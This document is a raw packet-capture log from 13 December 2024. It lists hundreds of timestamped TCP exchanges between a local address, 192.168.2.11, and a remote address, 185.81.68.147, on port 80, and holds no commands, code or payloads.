                                                                                                                                                                                                Dec 13, 2024 08:18:52.413665056 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.413938046 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.413994074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.414104939 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.415131092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.415189028 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.415306091 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.416332006 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.416440010 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.416693926 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.417529106 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.417651892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.417752981 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.418699980 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.418797970 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.418905020 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.419892073 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.420017004 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.420126915 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.421109915 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.421212912 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.421319962 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.422290087 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.422403097 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.422502041 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.423546076 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.423788071 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.423894882 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.424705029 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.424808025 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.424916983 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.425860882 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.425971031 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.426023960 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.427068949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.427180052 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.427231073 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.428271055 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.428370953 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.428421021 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.429476023 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.429583073 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.429639101 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.430656910 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.430859089 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.430967093 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.431838989 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.431936979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.432039976 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.433041096 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.433130026 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.433226109 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.434237957 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.434351921 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.434453964 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.435406923 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.435519934 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.435627937 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.436600924 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.436753035 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.436852932 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.437817097 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.437937021 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.438031912 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.439038992 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.439122915 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.439219952 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.440205097 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.440309048 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.440396070 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.441389084 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.441524982 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.441615105 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.442620993 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.442816973 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.442948103 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.443778992 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.443900108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.444022894 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.444972992 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.445079088 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.445194960 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.446199894 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.446383953 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.446501017 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.447361946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.447443008 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.447555065 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.448544979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.448652029 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.448765039 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.449738979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.449839115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.450956106 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.451045036 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.451078892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.452136993 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.452250004 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.452258110 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.452696085 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.453347921 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.453423977 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.453536987 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.454530954 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.454643011 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.454761982 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.455709934 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.455835104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.455954075 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.456923008 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.457010984 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.457125902 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.458095074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.458204985 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.458319902 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.459327936 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.459418058 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.459537983 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.460486889 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.460598946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.460711002 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.461724043 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.461826086 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.461935997 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.462963104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.462987900 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.463085890 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.464096069 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.464210987 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.464297056 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.465271950 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.465369940 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.465459108 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.466473103 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.466579914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.466742992 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.467670918 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.467804909 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.467900038 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.468947887 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.469038010 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.469137907 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.470101118 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.470113039 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.470196962 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.471276999 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.471390009 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.471477032 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.472456932 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.472533941 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.472620964 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.473619938 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.473740101 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.473829985 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.474853992 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.474939108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.475105047 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.475970984 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.527525902 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.605340004 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.605479956 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.605638027 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.605911016 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.606013060 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.606107950 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.607105017 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.607223034 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.607325077 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.608330965 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.608462095 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.608556986 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.609498024 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.609642982 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.609747887 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.610724926 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.610822916 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.610923052 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.611887932 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.612061024 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.612159014 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.613101959 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.613207102 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.613297939 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.614279985 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.614406109 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.614501953 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.615492105 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.615592003 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.615685940 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.616656065 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.616779089 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.616874933 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.617858887 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.617979050 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.618097067 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.619075060 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.619152069 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.619246960 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.620270014 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.620373964 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.620470047 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.621450901 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.621587992 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.621680975 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.622651100 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.622771978 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.622865915 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.623827934 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.623853922 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.623960018 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.625025034 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.625130892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.625226021 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.626213074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.626318932 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.626414061 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.627450943 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.627599001 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.627685070 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.628633976 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.628734112 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.628823042 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.629812002 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.629924059 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.630012989 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.631007910 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.631115913 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.631205082 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.632199049 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.632308006 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.632396936 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.633405924 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.633559942 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.633661985 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.634603024 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.634704113 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.634793043 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.635777950 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.635879993 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.635973930 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.636971951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.637092113 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.637182951 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.638147116 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.638242960 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.638334036 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.639338970 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.639462948 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.639550924 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.640547037 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.640634060 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.640722990 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.641721964 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.641830921 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.641918898 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.642970085 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.643075943 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.643173933 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.644126892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.644251108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.644345045 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.645330906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.645451069 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.645567894 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.646615028 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.646747112 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.646835089 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.647736073 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.647872925 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.647963047 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.648922920 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.649024963 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.649111986 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.650110006 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.650273085 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.650358915 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.651294947 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.651434898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.651580095 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.652512074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.652630091 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.652725935 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.653711081 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.653829098 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.653918028 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:52.654886961 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.654992104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:52.655078888 CET4972680192.168.2.11185.81.68.147
